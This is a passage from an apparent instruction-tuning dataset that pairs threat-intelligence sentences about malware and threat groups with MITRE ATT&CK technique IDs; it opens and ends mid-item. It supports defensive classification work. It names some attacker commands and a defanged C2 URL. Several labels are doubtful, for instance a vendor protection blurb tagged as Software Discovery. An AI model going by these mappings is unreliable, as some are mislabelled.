data sets .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet collects system information including computer and domain names, OS version, and S7P paths.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RawPOS dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various Lazarus Group malware modifies the Windows firewall to allow incoming connections or disable it entirely using netsh.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reasons for Defacement include delivering messaging, intimidation, or claiming credit for an intrusion.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has encrypted data sent to the C2 server using a XOR key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can encrypt data using AES prior to exfiltration.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS attempts to hide its payloads using legitimate filenames.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShellTea utilizes a number of techniques to identify if it is running within a virtual environment or is being monitored.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete malware used Python’s urllib library to make HTTP requests to the C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project , and Azure's CLI command az vm list lists details of virtual machines.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used WMI to identify anti-virus products installed on a victim's machine.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has been observed loading a Linux Kernel Module and then deleting it from the hard disk as well as overwriting the data with null bytes.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has created a scheduled SYSTEM task that runs when a user logs in.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used a malicious framework designed to impersonate the lsass.exe/vmtoolsd.exe token.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 has functionality to copy itself to removable media.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Example commands that can be used to obtain security software information are netsh, reg query with Reg, dir with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D can use HTTP POST and GET requests to send and receive C2 information.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,05 27 28 obj32.bin obj32.bin obj64.bin Shellcode template is used by Reinstaller/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information or Phishing.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious document used by Tropic Trooper PDB Strings as Context Clues The MSI file has two program database (PDB) strings inside: one belonging to the MSI file, and another for the backdoor installer (detected by Trend Micro as TROJ_TCDROP.ZTFB)### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth has a command to timestop a file or directory.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an initial connectivity check fails, pngdowner attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GLOOXMAIL communicates to servers operated by Google using the Jabber/XMPP protocol.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POORAIM has been delivered through compromised sites acting as watering holes.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has abused the PasswordChangeNotify to monitor for and capture account password changes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak lists running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has run a keylogger plug-in on a victim.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax retrieved a list of the system's network interface after execution.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can download additional payloads from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has purchased domains for use in targeted campaigns.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has collected schemas and user accounts from systems running SQL Server.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer can use supplied user credentials to execute processes and stop services.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke uses HTTP and HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used a Windows version of the Linux touch command to modify the date and time stamp on DLLs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can upload data from the victim's machine to the C2 server.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can load any files onto the infected machine to execute.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sharpshooter has sent malicious attachments via emails to targets.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group has used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The full contents of the batch script are given in Appendix C – a.bat### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE uses the ipconfig /all command to gather the victim’s IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has sent e-mails with malicious links often crafted for specific targets.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used batch scripts to enumerate network information, including information about trusts, zones, and the domain.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has the ability to list all running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the user enables macros, the macro will perform the following actions: Displays decoy content Checks for the existence of a file at %APPDATA%\wscript.exe If %APPDATA%\wscript.exe does not exist, the macro converts an embedded hex-encoded string into bytes and saves this data to the %APPDATA%\wscript.exe### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can identify the user and groups the user belongs to on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are also specific applications that store passwords to make it easier for users manage and maintain.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The usage of LinkedIn to deliver malicious documents,### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to record video on a compromised host.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Regsvr32.exe to proxy execution of malicious code.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DLL side loading is often used to maintain persistence on the compromised system### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 malware has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keep security software up-to-date with the latest definitions Protection Norton Security, Symantec Endpoint Protection, and other Symantec security products protect users against these threats through the following detections: AV Backdoor.Cadelspy Backdoor.Remexi Backdoor.Remexi.B IPS System Infected: Backdoor.Cadelspy Activity 2 System Infected: Backdoor.Remexi Activity Indicators of compromise We have also compiled an indicators-of-compromise document containing further details which can be used to help identify the threats if they are present in your environment### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has collected files from various information repositories.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CoinTicker downloads the following hidden files to evade detection and maintain persistence: /private/tmp/.info.enc, /private/tmp/.info.py, /private/tmp/.server.sh, ~/Library/LaunchAgents/.espl.plist, ~/Library/Containers/.random string/random string.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With these permissions, an adversary could potentially browse to any resource on an intranet, such as Sharepoint or webmail, that is accessible through the browser and which the browser has sufficient permissions.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may communicate using the Domain Name System application layer protocol to avoid detection/network filtering by blending in with existing traffic.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of two or multi-factor authentication is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can use Native API for execution and to retrieve active services.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once a user logs out, the history is flushed to the user’s .bash_history file.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used command line for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker's PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can use pre-configured HTTP proxies.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hi-Zor executes using regsvr32.exe called from the Registry Run Keys / Startup Folder persistence mechanism.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has bypassed UAC.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug has used keylogging tools.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe collects the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can explore files on a compromised system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use VBS to download and execute malicious files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has encrypted data with XOR before sending it over the C2 channel.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After running within the %TEMP% path, Comnie will delete the original file### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Displayed below are these new, xml formatted plugin names “weap_hwi”, “ps”, and “vsnet” in a BlackEnergy configuration file download from a c2 server### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can add a service called WBService to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK has the capability to capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has obfuscated strings with base64 encoding.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 copied and installed tools for operations once in the victim environment.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has created new services for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can retrieve system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can use icacls /reset and takeown /F to reset a targeted executable's permissions and then take ownership.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operating systems may contain commands to initiate a shutdown/reboot of a machine.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify system firmware to persist on systems.The BIOS and The Unified Extensible Firmware Interface or Extensible Firmware Interface are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan can XOR-encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt uses cmd.exe to create a reverse shell on the infected endpoint.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can create, delete, or modify a specified Registry key or value.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Psylo has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows shared drive and SMB/Windows Admin Shares connections can be removed when no longer needed.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker's custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to download additional payloads from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI can download files and execute them on the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet is known to use RSA keys for encrypting C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to use HTTP in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domains http://mdzz2019.noip[.]cn:19931 http://mdzz2019.noip[.]cn:3654/ From my analyses, I was able to identify http://mdzz2019.noip[.]cn:19931 as its main C2 url.  This is a dynamic DNS, meaning the actual IP changes quite frequently### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception lured victims into clicking malicious files for machine reconnaissance and to execute malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can collect data from the system, and can monitor changes in specified directories.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has disguised a malicious .app file as a Flash Player update.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during Spearphishing Link.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JSS Loader can download and execute VBScript files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used compromised servers as infrastructure.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the getInstalledAPP function to run ls -la /Applications to gather what applications are installed.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can collect the username from a victim machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth uses certutil and BITSAdmin to download additional malware.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has gathered a recursive directory listing to find files and directories of interest.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal can check the system time set on the infected host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin decodes an embedded executable using base64 and decompresses it.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used account credentials they obtained to attempt access to Group Managed Service Account passwords.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted .### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox has used HTTP POST requests for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can make small changes to itself in order to change its checksum and hash value.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used stolen code signing certificates to sign malware.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used AES for encryption of command and control traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has injected an install module into a newly created process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is responsible for executing commands in cmd.exe (later down in the functions, not seen in the screenshot, it looks for cmd.exe and executes it using CreateProcessA)### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to decrypt files downloaded from C2.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may Create Cloud Instance and stage data in that instance.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\SYSTEM\\CurrentControlSet or ControlSet001\Control\Print\Environments\\Windows architecture: e.g., Windows x64\Print Processors\\user defined\Driver Registry key that points to the DLL.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can exfiltrate locally stored data via its C2.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used batch scripts on victim's machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These rules may be created through a local email application, a web interface, or by command-line interface.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has leveraged malicious Word documents that abused DDE.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has enumerated hosts, looking to obtain a list of all currently running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CopyKittens uses ZPP, a .NET console program, to compress files with ZIP.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UPPERCUT has the capability to obtain the time zone information and current timestamp of the victim’s machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location , including the original hosting site of the tool.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has communicated with C2 over HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic uses the net time command to get the system time from the machine and collect the current date and time zone information.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton uses an encrypted file to store commands and configuration values.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has been known to create or enable accounts, such as support_388945a0.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to communicate with C2 with TCP over port 443. gh0st RAT has used an encrypted protocol within TCP segments to communicate with the C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT uses HTTPS and HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can execute loadfromfile, loadfromstorage, and loadfrommem to inject a DLL from disk, storage, or memory respectively.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can perform keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28…) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings: Figure 8 inf method used by Cannon When comparing the two Cannon variants, we found a method within a Delphi Cannon sample (SHA256: 5a02d4e5f6…) showing the use of Running place and Logical_Drivers as header strings to the system information it is collecting and sending to the C2 via email### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following are the three files: Defender.sct – The malicious JavaScript based scriptlet file### 